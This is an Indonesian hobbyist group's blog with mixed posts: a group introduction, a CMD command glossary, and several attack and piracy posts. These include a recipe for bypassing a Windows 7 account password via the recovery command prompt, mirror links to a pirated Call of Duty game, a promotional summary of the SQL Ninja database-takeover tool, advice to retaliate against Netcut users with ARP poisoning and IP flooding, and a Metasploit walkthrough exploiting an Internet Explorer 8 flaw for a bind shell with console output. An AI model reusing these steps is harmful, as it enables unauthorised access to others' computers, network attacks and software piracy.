APA KABAR KAWAN - KAWAN GSONERS, TERIMA KASIH SUDAH MENGUNJUNGI BLOG KAMI DAN SATU LAGI JANGAN LUPA YA KUNJUNGI FORUM DAN GRUP FB KAMI. TERIMA KASIH SALAM TANGAN SILANG DARI KAMI
G-Sonic berdiri pada tanggal 1 Desember 2011 yg awalnya di gawangi oleh :
*Rangga (BSI)
*Ableh (Usni)
*Robby (Usni)
*Kibo (Usni)
*Bobby (IPB)
*Anas (Karyawan)
*Saipul (Uhamka)
*Adi (Usni)
*Rosma (Usni)
*Bella (Usni)
*Nurul (Usni)
*Joe (Gunadarma)
*Khaidar (UI)
*Ricky (UP)

kami sengaja membentuk Forum/Organisasi ini untuk membangun ke solidaritasan antar teknik semua jurusan, tidak membeda-bedakan sesama,menjalin kekompakkan, membentuk kepemimpinan, membangun logika otak masing-masing dan menghasilkan sebuah karya yang bisa bermanfaat bagi semua. Didalamnya terdapat orang-orang yang memiliki jiwa teknik dan siap mengarahkan teman-teman menggapai tujuan yang sudah dituju.
ARTI LAMBANG G : Global = mencakup secara global bagi semua orang ataupun berbeda jurusan namun memiiki jiwa teknik
Petir : Identik dengan Teknik = harus memiliki sikap yang tanggap, cepat dalam merespon, dan cepat dalam bertindak
Percikan = bahwa karya-karya yang dibuat oleh anggota G-Sonic dapat bermanfaat bagi masyarakat luas.
Visi : Gunakanlah Otakmu dan janganlah menggunakan software atau aplikasi selagi masih bisa menggunakan otak dan logika atau jadikanlah dirimu dewasa dan pertahankan arti persahabatan.
Misi : Membangun Jiwa kepemimpinan, menciptakan ide-ide yg brilian, membuat logika dan otak yg berbicara, menghasilkan sebuah karya, membantu lulusan gsonic untuk belajar usaha dan mempunyai pikiran untuk ke depannya nanti.
Semboyan : Keep FriendShip 'N' Brotherhood Forever berbeda tetapi satu, We are not Friend But We Are Family, We are not Hacker, Defacer, Attacker, Cheater and Cracker But We Technical
≈We Life Together
≈We Fight Together
≈We Die Together
≈We Walk Together
Satu Tujuan Kita semua Tanpa ada rasa menyerah, Mari kita berkarya untuk kalian semua Bersama Teknik Kemarin, Hari ini Dan untuk selama-lamanya
*KITA DISINI MENJUNJUNG NAMA TEKNIK*
*KITA DISINI MENJUNJUNG PERSAUDARAAN*
*KITA DISINI SEMUA ADALAH SATU*
Keep N Touch Ur Heart For Teknik Brotherhood
18 Apr 2012

0
Lets Join Us Kawan ...



29 Feb 2012

0
Membobol WIndows 7 Yang Di Password

Sebelumnya pada versi windows terdahulu yakni windows XP, aktivitas pembobolan password administrator sudah ditemukan cara jitunya yakni dengan menekan tombol CTRL+ALT+DEL secara bersamaan sebanyak 2X, mungkin ada diantara sobat sekalian yang sudah mengetahui cara tersebut.....??

Nah..., kalo windows XP sudah bisa dibobol, trus bagaimana dengan windows 7, ok check thisOut windows 7 akun administrator secara default di sembunyikan / di-hidden oleh system sehingga pengguna awam yang tidak mengetahui passwordnya tidak akan bisa mengakses akun yang ingin dimasukinya. Berikut saya beri tahu salah satu trik jitu untuk membobol akun windows 7 yang di password oleh pemiliknya. Cara ini sudah pernah saya coba dan 100% berhasil.... Oke silahkan baca selengkapnya..

Caranya sebagai berikut :
  1. Restart komputernya, sebelum logo windows muncul, cepat sobat tekan tombol F8. Disini sobat masuk ke jendela safe modenya windows.
  2. Di sini adaa beberapa pilihan yang tersedia, sobat pilih saja repair your computer, nanti akan muncul jendela repair komputer.
  3. Setelah sudah tampil interface dari Jendela Repair Your Computer, klik Open Command Prompt, Lalu sobat ketikan perintah berikut pada jendela comand promt tadi ketikan ” net user administrator /active:yes” ** tanpa tanda petik.
  4. Setelah ada pesan the command active successfull, ketikan perintah ini net user administrator password**ganti kata password sesuai keinginan sobat, misalnya "net user administrator saya"
  5. Di sini sobat sudah berhasil mengganti pasword komputer tadi dengan pasword "saya". Tutup jendela command promptnya, klik restart komputer
  6. Setelah komputer meminta memasukan pasword administratornya sobat masukan deh tuh pasword yang tadi..
21 Feb 2012

0
Call Of Duty Modern Warfare 3




Call of Duty: Modern Warfare 3 (abbreviated as Call of Duty: MW3, CoD: MW3 or simply MW3) is an upcoming first-person shooter video game, currently being developed by Infinity Ward and Sledgehammer Games with Raven Software assisting in development.[7] It will be the third installment in the Modern Warfare series, a direct sequel to 2009's Call of Duty: Modern Warfare 2, and the eighth Call of Duty installment. It is set to be released on November 8, 2011 on Microsoft Windows, Xbox 360, Playstation 3,[8] and Wii,[6] with a separate version for Nintendo DS being

developed by n-Space.[5] In Australia, the Wii version will be released on November 17, 2011.[9] In Japan, Square Enix will handle this installment with a separate subbed and dubbed version, just like with Call of Duty: Black Ops. First, they will release a Japanese-subtitled version on November 17, 2011. Then, on December 22, 2011, they will release a Japanese voice-dubbed version.

CPU: Intel® Core™ 2 Duo E6600 or AMD Phenom™ X3 8750 processor or better
RAM: 2GB RAM
VGA: Shader 3.0 or better 256 MB NVIDIA®GeForce™ 8600GT / ATI® Radeon™ X1950 or better
DX: DirectX® 9.0C or later
OS: Windows® XP / Windows Vista® / Windows® 7
http://gamesystemrequirements.com/
HDD: 16 GB free hard drive space
http://linksafe.me/d/a3f9cb6c10/exya3mkvq97zrl7
http://linksafe.me/d/e1f089da6a/el6bws4i7eh3jt4
http://linksafe.me/d/07bb238434/mczv9ygn8fvxsui
http://linksafe.me/d/10d075a7a2/9hfsszzshyhms7q
http://linksafe.me/d/888d99096e/55rml297cbsmqh7
http://linksafe.me/d/ce36cb5228/5uu8burticjc9he
http://linksafe.me/d/a2bc018fef/e9421xka1771tbo
http://linksafe.me/d/a3caa60628/df3a1kylrfrm7o2
http://linksafe.me/d/20aea88e00/hqm0bkv1kyyaau6
http://linksafe.me/d/ed6d433273/s8ce8ryc22f1c2e
http://linksafe.me/d/f388e60750/60cfm0trkkgcv98
http://linksafe.me/d/8412c71a37/oh8wnl5sap8k7bp
http://linksafe.me/d/ba29f9b22d/28w8jtz1vj33ve7
http://linksafe.me/d/841114d6b2/19pwb9ljtrxdtf1
http://linksafe.me/d/a06ad8cc99/eugojzsffn212rb
http://linksafe.me/d/03146e8abc/akk1sa43g3k7a44
http://linksafe.me/d/441a0dd683/eq6bbwx2lh59s3x
http://linksafe.me/d/a94384b7ea/fndpbsm08gibgz1
http://linksafe.me/d/57a15e9b28/4jepiwwvgwmw39a
http://linksafe.me/d/656e3d1383/e2i1qque7gj1m91
http://linksafe.me/d/60afdbf187/0vtk2xfbt1xsg9u
http://linksafe.me/d/eb81b133e7/ki42ihtihrhdd4n
http://linksafe.me/d/60818a6039/vcesnjc7cbl9a52
http://linksafe.me/d/7bee20ae3e/5790l2m31rdzfym
http://linksafe.me/d/4e149090f3/jeediudoyubu18u
http://linksafe.me/d/8338df2619/87593s1ko06mjks
http://linksafe.me/d/bd691ac49b/wikjyvotlfw4bg8
http://linksafe.me/d/0712a593ee/yiz5lrgf1jyx3g3
http://linksafe.me/d/8712d63bc6/yzdxa6bvazqdwsd
http://linksafe.me/d/d4253c9532/g5gswgvhbmal9em
http://linksafe.me/d/c40eff9b6b/rfsmv5tclxkv899
http://linksafe.me/d/bed0ba67e3/1372921t6bv4hav
http://linksafe.me/d/6ee750ca8d/8bl5rgfhb1ygcmo
http://linksafe.me/d/81f0c4ec85/hf9wjxdcg14d10a
http://linksafe.me/d/14c4d73d91/968bpqrx4ubcu1b
http://linksafe.me/d/5e855b1a39/01effvzp422518c
http://linksafe.me/d/fcdb9e6b51/9dz0cnxp9ff0kpo
http://linksafe.me/d/c4dd9702df/c7bhqnhf3jnoxe2
http://linksafe.me/d/8b521673ca/j8p2mcwbozm138w
http://linksafe.me/d/c7a1b36fba/7dviivwjpk0uzk4
http://linksafe.me/d/1925bcba2f/psxp9c6smfyh8sb
http://linksafe.me/d/e61c22528e/a1j0gl9c2bvbx2s
http://linksafe.me/d/96650deb97/yv5zid7feqodqxr
http://linksafe.me/d/31af35f6e5/r1w928tytz3j4kf
http://linksafe.me/d/129a9ef2d4/77i1e1r9y8oeoj6
http://linksafe.me/d/1c4f198568/m8iga5ajtbo69by
http://linksafe.me/d/f52ffd3372/t41bpqnre1renj6
http://linksafe.me/d/b91afbae3d/7ww229fml7olcpo
http://linksafe.me/d/ef1e31660d/a4t90fr8zt9jb9l
http://linksafe.me/d/d642168e7e/4v37dybi91l1j5u
http://linksafe.me/d/0648ce6af2/0eo67x1kox7rele
http://linksafe.me/d/c5dab9fac8/lw6ouotwr1xl04g
http://linksafe.me/d/3158d84aa7/ay87xz4mxw725jg
http://linksafe.me/d/4bd2ad0a97/jxnkij6unp6zag0
http://linksafe.me/d/63671e7827/delbk63ip0jwi45
http://linksafe.me/d/140f47eea9/8sji641huyui5e2
http://linksafe.me/d/2582270f5c/kda9vu3r11pzyxk
http://linksafe.me/d/10ff20d1b9/0ied8c75fqdtoyo
http://linksafe.me/d/8edd06663b/lgxl03b54xkar84
http://linksafe.me/d/365dbd466a/4t47eqc9x9t946n
http://linksafe.me/d/ae7da8afd0/72kbu51jkyg9y3h
http://linksafe.me/d/26532a730a/udradcgd1hw5qdj
http://linksafe.me/d/edbb0b6e7a/31qt6kn3y3m90mo
http://linksafe.me/d/2f29cbc368/9cnacnsgagcb2x4
http://linksafe.me/d/6595f376f0/nip9g5u7310giuh
http://linksafe.me/d/2e0bf66d14/gk7paokj859j7f0
http://linksafe.me/d/541f799276/0azen9mjajel2gv
http://linksafe.me/d/596a59a0e1/5677qu9ggnl3wtr
http://linksafe.me/d/3d25f186c7/bz70z594gdmy02g
http://linksafe.me/d/bb170e4ec9/gpclicyo2nx5qo9
http://linksafe.me/d/3ae9a625fe/6gcdjj31w6zzogp

0
Sonic The Hedgehog 4 Episode 1

Sonic The Hedgehog 4 Episode 1

The sequel fans have waited 16 years for is finally here - Sonic the Hedgehog 4 Episode I! Featuring enhanced gameplay elements, including the classic Sonic Spin Dash, and the versatile Homing Attack, Sonic the Hedgehog 4 Episode I picks up right where Sonic and Knuckles™ left off. Dr. Eggman’s back, and in an effort to finally rid himself of Sonic, he revisits – and improves – the very best of his creations. Get ready for the next chapter in an all new epic 2D saga built for old and new fans alike.

No crack needed • No extraction needed • Backup Ready • Tested and working •
1: Download
2: Install
3: Play
Code:
10 Feb 2012

0
Perintah-Perintah CMD


perintah-perintah Command Prompt, atau sering kita sebut CMD. Command Prompt adalah sebuah perintah dos yang terdapat pada OS windows yang dapat memudahkan user dalam menjelajahi windows baik secara online maupun offline, dan aplikasi ini bisa juga disalahgunakan oleh seorang cracker untuk menjalankan aksi-aksinya hanya dengan menggunakan command prompt. Maka dari itu sebagai langkah antisipasi bagi anda sebagai user adalah dengan mengenal lebih jauh tentang seluk beluk dari command prompt agar bisa memahami cara kerja dan manfaatnya, salah satu dari sekian banyak manfaat dari command prompt adalah kemampuannya untuk mendeteksi adanya virus, memisahkan virus dengan file yang diinfeksinya, mencari file induk virus hanya dengan perintah ATTRIB. Berikut dibawah ini merupakan daftar perintah-perintah yang ada pada command prompt dari A-X :


a
ARP : Address Resolution Protocol
Assoc : Ubah ekstensi file asosiasi
ASSOCIAT : Salah satu langkah asosiasi file
Attrib : Ubah atribut berkas
b
Bootcfg : Edit Windows boot settings
BROWSTAT : Dapatkan domain, info browser dan PDC
c
CACLS : Ubah file permissions
CALL : Panggil satu program batch yang lain
CD : Mengganti Directory – pindah ke Folder tertentu
Change : Ganti Terminal Server Session properties
CHKDSK : Check Disk – memeriksa dan memperbaiki masalah disk
CHKNTFS : Periksa sistem file NTFS
CHOICE : Menerima input keyboard ke sebuah file batch
CIPHER : Encrypt atau Decrypt file / folder
CleanMgr : Ototmatis membersihkan Temperatur file, recycle bin
CLEARMEM : Hapus kebocoran memori
CLIP : Salin STDIN ke Windows clipboard.
CLS : Menghapus layar (Clear The Screen)
CLUSTER : Windows Clustering
CMD : Start a new CMD shell
COLOR : Mengubah warna dari jendela CMD
COMP : Membandingkan isi dari dua file atau set file
COMPACT : Compress file atau folder pada partisi NTFS
Compress : Compress tunggal file pada partisi NTFS
CON2PRT : Menghubungkan atau memutuskan sambungan dengan Printer
CONVERT : Konversi FAT ke drive NTFS
COPY : Menyalin satu atau lebih file ke lokasi lain
CSCcmd : clien-side caching (Offline Files)
CSVDE : Impor atau Ekspor Active Directory data
d
DATE : Display atau mengatur tanggal
Defrag : Defragment hard drive
DEL : Menghapus satu atau lebih file
DELPROF : Hapus profil pengguna NT
DELTREE : Menghapus folder dan semua subfolder
DevCon : Device Manager Command Line Utility
DIR : Menampilkan daftar file dan folder
DIRUSE : Tampilkan penggunaan disk
DISKCOMP : Bandingkan isi dua floppy disk
Diskcopy : Salin isi dari satu disket ke yang lain
DISKPART : Disk Administrasi
DNSSTAT : DNS Statistik
DOSKEY : Edit baris perintah, ingat perintah, dan membuat macro
DSADD : Tambah User (komputer, group ..) ke direktori aktif
DSQUERY : Daftar item dalam direktori aktif
DSMOD : Ubah user (computer, group ..) di direktori aktif
DSRM : Hapus item dari Active Directory
e
ECHO : Menampilkan pesan di layar
ENDLOCAL : Akhir localisation perubahan lingkungan dalam file batch
ERASE : Menghapus satu atau lebih file
EVENTCREATE : Tambahkan pesan ke Windows event log
EXIT : Keluar dari skrip arus / rutin dan menetapkan errorlevel
EXPAND : uncompress file
Ekstrak : uncompress file CAB
f
FC : Bandingkan dua file
FIND : Mencari string teks dalam sebuah file
FINDSTR : Cari string dalam file
FOR / F : pengulangan perintah terhadap satu set file
FOR / F : pengulangan perintah terhadap hasil perintah lain
FOR : pengulangan perintah terhadap semua options Files, Directory, List
FORFILES : Proses Batch beberapa file
FORMAT : Format disk
FREEDISK : Periksa free disk space/disk yang tersisa (dalam bytes)
FSUTIL : File dan Volume utilitas
FTP : File Transfer Protocol
FTYPE : Tampilkan atau memodifikasi jenis file yang digunakan dalam asosiasi ekstensi file
g
GLOBAL : Display keanggotaan kelompok global
GOTO : Direct a batch program untuk melompat ke baris berlabel
GPUPDATE : Update pengaturan Kebijakan Grup
h
HELP : Online Help
i
ICACLS : Ubah file dan folder permissions
IF : kondisional melakukan perintah
IFMEMBER : Apakah pengguna saat ini dalam sebuah NT Workgroup
IPCONFIG : Configure IP
k
KILL : Remove program dari memori
l
LABEL : Edit disk label
LOCAL : Display keanggotaan kelompok-kelompok lokal
LOGEVENT : Menulis teks ke NT event viewer
Logoff : user log off
LOGTIME : log tanggal dan waktu dalam file
m
MAPISEND : Kirim email dari baris perintah
MBSAcli : Baseline Security Analyzer
MEM : Display penggunaan memori
MD : Buat folder baru
MKLINK : Buat link simbolik (linkd)
MODE : Mengkonfigurasi perangkat sistem
MORE : Display output, satu layar pada satu waktu
MOUNTVOL : mengelola volume mount point
MOVE : Pindahkan file dari satu folder ke yang lain
MOVEUSER : Pindahkan pengguna dari satu domain ke domain lainnya
MSG : mengirim pesan atau message
MSIEXEC : Microsoft Windows Installer
MSINFO : Windows NT diagnostics
MSTSC : Terminal Server Connection (Remote Desktop Protocol)
MUNGE : Cari dan Ganti teks dalam file (s)
MV : Copy in-menggunakan file
n
NET : Kelola sumber daya jaringan
NETDOM : Domain Manager
Netsh : Configure Network Interfaces, Windows Firewall & Remote akses
NETSVC : Command-line Service Controller
NBTSTAT : Tampilkan statistik jaringan (NetBIOS over TCP / IP)
NETSTAT : Display networking statistics (TCP / IP)
NOW : Tampilan saat ini Tanggal dan Waktu
NSLOOKUP : Nama server lookup
NTBACKUP : Backup folder ke tape
NTRIGHTS : Edit hak user account
p
PATH : Menampilkan atau menetapkan path pencarian untuk file executable
PATHPING : jejak jalur jaringan ditambah paket latensi dan kerugian
PAUSE : memenjarakan(suspend) pengolahan file batch dan menampilkan pesan
perms : Tampilkan izin untuk pengguna
PERFMON : Kinerja Monitor
PING : Menguji koneksi jaringan
POPD : Mengembalikan nilai sebelumnya dari direktori sekarang yang disimpan oleh PUSHD
PORTQRY : Tampilan status ports dan services
Powercfg : Mengkonfigurasi pengaturan daya
PRINT : Mencetak file teks
PRNCNFG : Display, mengkonfigurasi atau mengubah nama printer
PRNMNGR : Tambah, menghapus, daftar printer menetapkan printer default
PROMPT : Mengubah command prompt
PsExec : Proses Execute jarak jauh
PsFile : menampilkan file dibuka dari jarak jauh (remote)
PsGetSid : Menampilkan SID sebuah komputer atau pengguna
PsInfo : Daftar informasi tentang sistem
PsKill : proses mematikan berdasarkan nama atau ID proses
PsList : Daftar informasi rinci tentang proses-proses
PsLoggedOn : siapa saja yang log on (lokal atau melalui resource sharing)
PsLogList : catatan kejadian log
PsPasswd : Ubah sandi account
PsService : Melihat dan mengatur layanan
PsShutdown : Shutdown atau reboot komputer
PsSuspend : proses Suspend
PUSHD : Simpan dan kemudian mengubah direktori sekarang
q
QGREP : Cari file(s) untuk baris yang cocok dengan pola tertentu
r
RASDIAL : Mengelola koneksi RAS
RASPHONE : Mengelola koneksi RAS
Recover : perbaikan file yang rusak dari disk yang rusak
REG : Registry = Read, Set, Export, Hapus kunci dan nilai-nilai
REGEDIT : Impor atau ekspor pengaturan registry
Regsvr32 : Register atau unregister sebuah DLL
REGINI : Ubah Registry Permissions
REM : Record comments (komentar) di sebuah file batch
REN : Mengubah nama file atau file
REPLACE : Ganti atau memperbarui satu file dengan yang lain
RD : Hapus folder (s)
RMTSHARE : Share folder atau printer
Robocopy : Copy File dan Folder secara sempurna
RUTE : Memanipulasi tabel routing jaringan
RUNAS : Jalankan program di bawah account pengguna yang berbeda
RUNDLL32 : Jalankan perintah DLL (add / remove print connections)
s
SC : Control Layanan
SCHTASKS : Jadwal perintah untuk dijalankan pada waktu tertentu
SCLIST : Tampilkan Layanan NT
SET : Display, set, atau menghapus variabel environment
SETLOCAL : Pengendalian environment visibilitas variabel
SETX : Set variabel environment secara permanen
SFC : Pemeriksa Berkas Sistem
SHARE : Daftar atau mengedit file share atau share print
SHIFT : Shift posisi digantikan parameter dalam sebuah file batch
SHORTCUT : jendela Buat shortcut (. LNK file)
SHOWGRPS : Daftar NT Workgroups seorang pengguna telah bergabung
SHOWMBRS : Daftar Pengguna yang menjadi anggota dari sebuah Workgroup
SHUTDOWN : Shutdown komputer
SLEEP : Tunggu untuk x detik
SLMGR : Software Licensing Management (Vista/2008)
SOON : Jadwal perintah untuk menjalankan dalam waktu dekat
SORT : Sort input
START : memulai sebuah program atau perintah dalam jendela terpisah
SU : Switch User
SUBINACL : Edit file dan folder Permissions, Kepemilikan dan Domain
SUBST : Associate jalan dengan huruf drive
Systeminfo : Daftar konfigurasi sistem
t
TASKLIST : Daftar menjalankan aplikasi dan services
TASKKILL : Hapus proses yang berjalan dari memori
TIME : Menampilkan atau mengatur waktu sistem
TIMEOUT : penundaan pemrosesan dari sebuah batch file
TITLE : Mengatur judul window untuk sesi cmd.exe
TLIST : daftar tugas dengan path lengkap
TOUCH : mengganti file timestamps
Tracert : Trace route ke sebuah remote host
TREE : tampilan grafis struktur folder
TYPE : Menampilkan isi dari file teks
u
USRSTAT : Daftar domain nama pengguna dan terakhir login
v
VER : Tampilkan versi informasi
VERIFY : Pastikan bahwa file sudah disimpan
VOL : Menampilkan sebuah label disk
w
WHERE : Menempatkan dan menampilkan file dalam sebuah pohon direktori
wHOAMI : Output UserName saat ini dan manajemen domain
WINDIFF : Bandingkan isi dua file atau set file
WINMSD : Sistem Windows diagnostik
WINMSDP : Sistem Windows diagnostik II
WMIC : Perintah WMI
x
XCACLS : Ubah file dan folder permissions
XCOPY : Menyalin file dan folder
8 Feb 2012

0
SQL Ninja


SQL Ninja merupakan sebuah tool yang digunakan untuk SQL Injection dan merupakan tools untuk megambil alih database. Pada intinya SQL Ninja adalah alat yang ditargetkan untuk mengeksploitasi kelemahan SQL Injection pada aplikasi web yang menggunakan Microsoft SQL Server sebagai back end-nya dan juga sebagian lainnya.
Tujuan utama SQL Ninja adalah untuk menyediakan akses remote pada server database yang memiliki kerentanan, bahkan di lingkungan yang sangat secure sekalipun. Hal ini juga bisa digunakan oleh penetration tester untuk membantu dan mengotomatisasi proses dalam mengambil alih Server DB ketika kerentanan SQL Injection telah ditemukan.
Fitur yang tersedia:
Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
Bruteforce of ‘sa’ password (in 2 flavors: dictionary-based and incremental)
Privilege escalation to sysadmin group if ‘sa’ password has been found
Creation of a custom xp_cmdshell if the original one has been removed
Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
Direct and reverse bindshell, both TCP and UDP
ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can
resolve external hostnames (check the documentation for details about how this works)
Evasion techniques to confuse a few IDS/IPS/WAF
Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping
Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM

Sql Ninja menggunakan Perl, sehingga yang dibutuhkan adalah install Perl dan beberapa module berikut jika tidak ada secara default:
NetPacket
Net-Pcap
Net-DNS
Net-RawIP
IO-Socket-SSL
Net-Pcap
Anda juga akan memerlukan Metasploit Framework Minimum 3 di komputer anda untuk menggunakan modus serangan menggunakan metasploit, dan juga install VNC client jika Anda menggunakan payload VNC.

Jika sesuatu berjalan salah, sebaiknya anda mengaktifkan output verbose ketika install (-v opsi) dan / atau debugging (-d) harus menyediakan beberapa petunjuk. SQL Ninja bekerja pada system Gentoo, namun sqlninja telah dicoba untuk bisa berjalan pada sistem operasi berikut:
Linux
FreeBSD
Mac OS

0
Serangan balik buat pengguna Netcut

Anda masih sering menggunakan Net cut jika berada di area wifi ? Hentikan kebiasaan itu
karena tools Net cut kesayangan anda bisa menjadi bomerang buat komputer anda.

Hah masak sih ? serius kah ? Padahal kan udah pakai IP hidden
masak masih bisa ketangkep siapa penggunanya ?

Mau tau kenapa tetap masih bisa ketahuan ? lanjutkan aja baca artikel ini.

Konsep kerja Net cut

Pertama-tama mari kita lihat cara kerja netcut, bagaimana sebetulnya tool ini bisa memotong koneksi jaringan kita.

Dalam situasi normal, beginilah cara kerja komputer kita sewaktu mengirim data ke router.

Ada 2 hal yang diperlukan komputer kita untuk berkomunikasi yaitu IP address dan MAC address. Dalam situasi normal, apabila kita sedang berinternet, paket data yang kita kirimkan akan berisi IP address router dan MAC address router.

Apa yang dilakukan netcat untuk mengganggu komunikasi kita / melakukan cut koneksi kita ? Pada contoh di bawah ini komputer C adalah komputer pengguna netcat, netcat akan mengirimkan informasi palsu yang menyatakan bahwa IP address router (192.168.0.2) adalah dirinya (MAC address CC.CC.CC.CC.CC.CC). Serangan tipe ini disebut ARP poisoning (ARP = Address Resolution Protocol – protokol untuk mencari MAC address, ARP poisoning = meracuni proses ARP). Serangan tipe ini sederhana tetapi efektif karena komputer pada dasarnya adalah benda yang lugu (lucu-lucu guoblok !), jadi tanpa curiga komputer kita akan percaya begitu saja tanpa melakukan cek dan recek. Akibatnya adalah, tanpa merasa bersalah komputer kita akan mengubah MAC address router menjadi MAC address si komputer pengguna netcut (Komputer C), akibatnya kita tidak bisa browsing ke internet lagi dan si pengguna netcut ketawa-ketiwi geli.

Udah tau kan cara kerja dari Net cut ? sekarang saatnya menyerang balik nih buat si penggunanya

gunakan tools sniffer (wireshark adalah favorit saya), perhatikan traffic yang masuk, lakukan filter ARP, maka anda akan melihat ada paket-paket ARP gadungan yang masuk. Apa kriteria paket ARP gadungan ? Nah kita lihat dulu sebentar cara kerja ARP, belajar bentar yah biar gak bisa dibodohin penjahat.

Cara kerja ARP sederhana, pada saat komputer anda ingin mengirimkan paket data maka dia akan bertanya kepada IP address tujuan, “hoiii bro….MAC kamu berapa ?”, lalu pertanyaan ini akan dijawab kembali oleh si empunya IP address, “halo bro, MAC saya XX.XX.XX”. Sudah selesai deh, sederhana kan. Nah kembali pada pertanyaan awal, bagaimana kita bisa membedakan paket ARP gadungan ? Saya yakin beberapa orang yang kritis pasti sudah dapat jawabannya. Perhatikan prosesnya, proses yang benar adalah kita bertanya, lalu dijawab…. ARP poisoning bekerja dengan cara, tidak ada yang tanya, tapi ada jawabannya…. Jadi so komputer pengguna netcut (komputer C) akan terus-terusan mengirimkan paket jawaban ARP yang berisikan informasi palsu, oleh karena itu teknik ini disebut ARP poisoning.

Nah setelah kita menemukan paket-paket gadungan itu, tinggal di cek deh, datangnya dari komputer mana, nah sekarang kita tahu MAC address si penjahat. Selanjutnya yang perlu kita lakukan adalah melakukan query MAC address si penjahat (banyak website di google yang bisa), maka kita bisa tahu merek laptop yang digunakan apakah apple, toshiba, ibm, dll. Kalau kita sedang di area publik, kita bisa lihat-lihat sekeliling dan mulai menetapkan tersangka.

Best defense is a strong offense (pertahanan terbaik adalah serangan yang kuat), sekarang saatnya pembalasan. Karena kita sudah tahu MAC address si penjahat, maka kita bisa tahu IP addressnya sekarang. Pertanyaannya, bagaimana caranya kita melakukan cut koneksi dia ? Netcut mempunyai fitur proteksi, dimana komputer yang menjalankan netcut akan melakukan blokir terhadap paket-paket ARP sehingga tidak bisa diserang balik oleh ARP poisoning.Tenang aja ada banyak jurus yang bisa dipakai.

1. Lakukan ARP poisoning bukan ke komputer dia, tetapi langsung ke router. Kirim paket ARP palsu ke router dan katakan bahwa IP address si penjahat (komputer C = 192.168.0.3) adalah MAC address komputer anda, heheheh dia boleh proteksi komputer sendiri, tapi kalau tidak ada paket data yang bisa masuk ke komputernya karena sudah kita belokkan, mau apa ? Dengan cara ini, karena data dari router dialihkan ke komputer kita, maka kita bisa melihat apa yang sedang dikerjakan oleh komputer dia.

2. MAC address ada di layer 2, kalau layer 2 di proteksi, kita serang di layer 3, set IP address secondary anda menjadi IP yang sama dengan si penjahat, kirim ping nonstop dengan parameter -t ke router dengan IP address secondary anda. Maka network akan mendeteksi duplicate IP address terus menerus.

3. Apabila anda kebetulan adalah admin jaringan tersebut, hancurkan layer 1 nya…. lacak si penjahat terhubung melalui port mana, shut down port tersebut, beres toh….

4. Apabila ingin terlihat lebih ganas lagi anda bisa menggunakan teknik Remote Desktop.

masih belum juga percaya kalau pengguna Net cut bisa dilacak ? Callme aja kita wifi-an bareng-bareng
terus anda pakai tuh tools kesayangan Net cut, nanti aku praktekin langsung deh.
tapi resikonya tanggung sendiri ya

1
Your Uninstaller! 7.4 Full Version


Meng-uninstall software ataupun game melalui add or remove programs di Windows biasanya masih akan menyisahkan beberapa file dan registry sampah yang hanya memberatkan kinerja komputer atau notebook kita. Your Uninstaller PRO, software uninstaller yang sangat handal digunakan untuk menguninstal software. Your Uninstaller akan membersihkan folder, file dan registry-registry software yang di uninstal sampai bersih.

Gambar ... !!

Features yang tersedia

Remove programs that could not be removed by Add/Remove Program.
Advanced Uninstall mode to fix Microsoft Installer problems.
System wide scan for unused files and registry keys after normal uninstall.
Hunter mode uninstall, hunts the programs and kill / uninstall / delete them.
Groups installed applications with various groups.
Never uninstall “must have” applications. (options)
Shows all applications installed on your computer with different views.
Uninstalls screen savers.
Built-in Disk Cleaner helps you find and remove unnecessary files on your disk to save
Built-in Trace Eraser removes surfing traces so no one knows your hobby.
Built-in IE Context Menu Cleaner cleans the context menu of Internet Explorer.
Built-in take full control of Window startups.
Built-in helps you keep your Start Menu clean.
Backup and restore installed-applications.
Powerful “Type and Go” search feature allows you quickly find the program you are about to uninstall.
Detect invalid installations and remove them with one click.
Force removal of uninstall related entries in the registry (care to use!).
Quickload mode loads programs extremely fast.
Give detailed report about any installed applications.
Export programs list to file or printer.

DOWNLOAD DISINI



0
Mencari shell windows 7 melalui jaringan



Windows 7 adalah Microsoft Windows yang menggantikan Windows Vista. Windows 7 adalah Windows terbaru saat ini yang dibuat oleh Microsoft.
Disini saya akan memberikan contoh bagaimana cara hacking mendapatkan shell di windows 7 melalui jaringan dengan memanfaatkan browser Internet Explorer 8 yang mempunyai celah keamanan pada penanganan Cascading Style Sheets di memory (http://www.microsoft.com/technet/security/bulletin/ms11-003.mspx).Oke saya langsung saja.
Pertama kali download Metasploit Framework 3.71 atau yang lebih baru, setelah didownload maka anda jalankan metasploitnya, disini penulis menggunakan GUI. Setelah masuk di tampilan GUI maka klik Exploits -> Windows -> Browser -> ms11_003_ie_css_import, payload yang penulis pilih adalah shell lalu bind shell, lalu port di set 80, URIPATH penulis set /, saat exploitasi penulis tampilkan dalam bentuk Run in Console.
————
\ ,__,
\ (oo)____
(__) )\||–|| *
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 59 days ago (2011.05.16)
Warning: This copy of the Metasploit Framework was last updated 59 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > exploit[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:80/
[*] Started bind handler
[*] Local IP: http://192.168.1.10:80/
[*] Server started.
